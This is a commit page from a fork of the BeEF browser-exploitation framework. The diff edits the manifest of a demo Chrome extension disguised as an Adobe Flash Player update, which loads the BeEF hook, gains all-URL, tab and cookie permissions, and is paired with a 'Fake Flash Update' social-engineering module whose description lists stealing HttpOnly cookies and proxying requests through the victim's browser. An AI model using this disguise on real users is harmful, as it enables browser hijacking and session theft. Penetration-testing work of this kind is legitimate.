Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Got a better splash image, added cookies permission, added some brief documentation

Browse Source
This commit is contained in:
Mike Haworth
2012-05-29 22:42:58 +12:00
parent 75315f8622
commit 172ec56be6
4 changed files with 11 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
extensions/demos/flash_update_chrome_extension/manifest.json
View File

@@ -1,10 +1,13 @@
{
// Simple chrome extension
// Just loads beef into the extension context.
//
// You may need to set the IP address of the beef hook in background.js
// Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
"name": "Adobe Flash Player",
"version": "1.0",
// when the browser icon is clicked, a new tab is open to maintain persistence (chrome.tabs.create)
// for the sake of testing...unfortunately the popup is closed when the user is not focusing on it.
// See at the end of index.html file.
"description": "Introduces vulnerabilites into webbrowsers",
"version": "11.2.202.235",
"description": "Introduces vulnerabilites into web browsers",
"background": {
"scripts": ["background.js"]
},
@@ -17,6 +20,7 @@
"tabs",
"http://*/*",
"https://*/*",
"file://*/*"
"file://*/*",
"cookies"
]
}

BIN
extensions/demos/html/adobe_flash_update.crx
View File

Binary file not shown.

BIN
extensions/demos/html/adobe_flash_update.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 30 KiB

After

Width:  |  Height:  |  Size: 47 KiB

2
modules/social_engineering/fake_flash_update/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension."
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source"
authors: ["mh"]
target:
user_notify: ['ALL']